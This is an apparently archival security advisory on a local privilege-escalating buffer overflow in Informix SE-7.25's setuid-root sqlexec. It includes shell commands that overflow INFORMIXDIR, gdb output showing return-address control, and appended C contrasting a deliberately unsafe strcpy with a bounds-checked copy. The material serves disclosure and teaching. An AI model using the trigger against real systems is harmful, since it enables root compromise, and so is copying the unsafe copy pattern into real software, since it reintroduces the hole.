COMMAND

    Informix local buffer overflow

SYSTEMS AFFECTED

    Informix SE-7.25
    Platform: only tested on Linux, but the bug is likely portable to other
    platforms the product runs on.

PROBLEM

    Juan Manuel Pascual Escriba [pask@uninet.edu] found the following bug:

    A buffer overflow occurs in sqlexec if the INFORMIXDIR environment
    variable is set to a value longer than 2023 bytes. sqlexec is installed
    setuid root (and setgid informix):

    [pask@dimoni lib]$ ls -FAlsc
    total 2588
       4 drwxrwxr-x   2 informix informix    4096 May 28 22:50 boom/
    1484 -rwsr-sr-x   1 root     informix 1515480 Apr 20 22:09 sqlexec*
     504 -rwxr-xr-x   1 informix informix  510283 Apr 20 22:09 sqlexecd*
     596 -rwxr-xr-x   1 informix informix  606041 Apr 20 22:09 sqlrm*
    [pask@dimoni lib]$ export INFORMIXDIR=`perl -e 'print "A"x2023'`
    [pask@dimoni lib]$ ./sqlexec
    [pask@dimoni lib]$ export INFORMIXDIR=`perl -e 'print "A"x2024'`
    [pask@dimoni lib]$ ./sqlexec
    Segmentation fault
    [pask@dimoni lib]$ gdb ./sqlexec
    (gdb) r
    Starting program: /home/informix/SE-7.25/lib/./sqlexec

    Program received signal SIGSEGV, Segmentation fault.
    0x41414141 in ?? ()
    (gdb) info registers
    ...
    esp            0x3fffed08       0x3fffed08
    ebp            0x41414141       0x41414141
    esi            0x3fffedf9       1073737209
    edi            0x8191571        135861617
    eip            0x41414141       0x41414141
    ...

    2023 bytes run cleanly; 2024 bytes crash with both the saved frame
    pointer (ebp) and the return address (eip) overwritten by the 'A'
    characters (0x41), so the value of INFORMIXDIR controls where sqlexec
    returns.

IMPACT

    Any user with execute permission on $INFORMIXDIR/lib/sqlexec (here
    /home/informix/SE-7.25/lib/sqlexec) can obtain euid=0 in a standard
    installation of Informix SE-7.25, because the binary is setuid root and
    the overwritten return address is under the user's control.

SOLUTION

    Nothing yet.
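The fault in the transcript is the classic pattern of a setuid program copying an environment variable into a fixed stack buffer without a length check. The following C is an added illustration of that pattern and of the check a fix would need; it is not Informix source, nor the finder's code. The buffer size INFORMIXDIR_MAX = 2024 is an assumption derived only from the 2023/2024 threshold observed above (the real frame layout inside sqlexec is not given by the advisory), and the function names are hypothetical. The safe variant is run against probes of both sizes; the unsafe one is shown for comparison and only ever called with a value that fits.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Assumed buffer size: the advisory shows 2023 bytes of INFORMIXDIR running
 * fine and 2024 crashing with EIP=0x41414141, so a fixed stack buffer of
 * about that size is modelled here. The real layout inside sqlexec is not
 * known from the advisory. */
#define INFORMIXDIR_MAX 2024

/* Vulnerable pattern (illustrative, not Informix source): an unbounded copy
 * of an attacker-controlled environment variable into a fixed stack buffer
 * inside a setuid-root program. With a value of INFORMIXDIR_MAX bytes or
 * more it writes past the buffer and, with enough bytes, over the saved
 * frame pointer and return address, which is what gdb showed as 0x41414141.
 * Only ever call this with short input. */
static int sqlexec_like_unsafe(const char *informixdir)
{
    char dir[INFORMIXDIR_MAX];
    strcpy(dir, informixdir);             /* no length check at all */
    return (int)strlen(dir);
}

/* Hardened pattern: bound the copy, refuse values that do not fit, and,
 * because a setuid binary must treat its environment as hostile, insist on
 * an absolute path. Returns the copied length, or -1 on rejection. */
static int sqlexec_like_safe(const char *informixdir, char *out, size_t outsz)
{
    if (informixdir == NULL || outsz == 0)
        return -1;
    size_t n = strlen(informixdir);
    if (n == 0 || n >= outsz)             /* needs room for the NUL */
        return -1;
    if (informixdir[0] != '/')            /* relative dirs are not accepted */
        return -1;
    memcpy(out, informixdir, n + 1);
    return (int)n;
}

/* Entry point as a setuid program would use it: read INFORMIXDIR from the
 * real environment through the checked path. */
static int informixdir_from_env(char *out, size_t outsz)
{
    return sqlexec_like_safe(getenv("INFORMIXDIR"), out, outsz);
}

/* Builds the same kind of probe the advisory built with perl ('A' x n), as
 * an absolute path so that only the length decides the outcome: "/" followed
 * by n-1 'A' bytes. Constructed test input; caller frees. */
static char *make_probe(size_t n)
{
    if (n == 0)
        return NULL;
    char *p = malloc(n + 1);
    if (p == NULL)
        return NULL;
    memset(p, 'A', n);
    p[0] = '/';
    p[n] = '\0';
    return p;
}

int main(void)
{
    char dir[INFORMIXDIR_MAX];
    size_t sizes[] = { 2023, 2024 };      /* the two lengths from the advisory */
    for (size_t i = 0; i < 2; i++) {
        char *probe = make_probe(sizes[i]);
        int rc = sqlexec_like_safe(probe, dir, sizeof dir);
        printf("INFORMIXDIR of %zu bytes: %s\n", sizes[i],
               rc < 0 ? "rejected" : "accepted");
        free(probe);
    }
    int rc = informixdir_from_env(dir, sizeof dir);
    printf("INFORMIXDIR from environment: %s\n",
           rc < 0 ? "rejected or unset" : dir);
    /* The unsafe variant is only exercised with a value that fits. */
    printf("unsafe copy of short value: %d bytes\n",
           sqlexec_like_unsafe("/opt/informix"));
    return 0;
}
```

The length check alone closes the overflow; the absolute-path check is the extra discipline a setuid program owes its environment, since INFORMIXDIR is later used to locate files the program opens with root privilege.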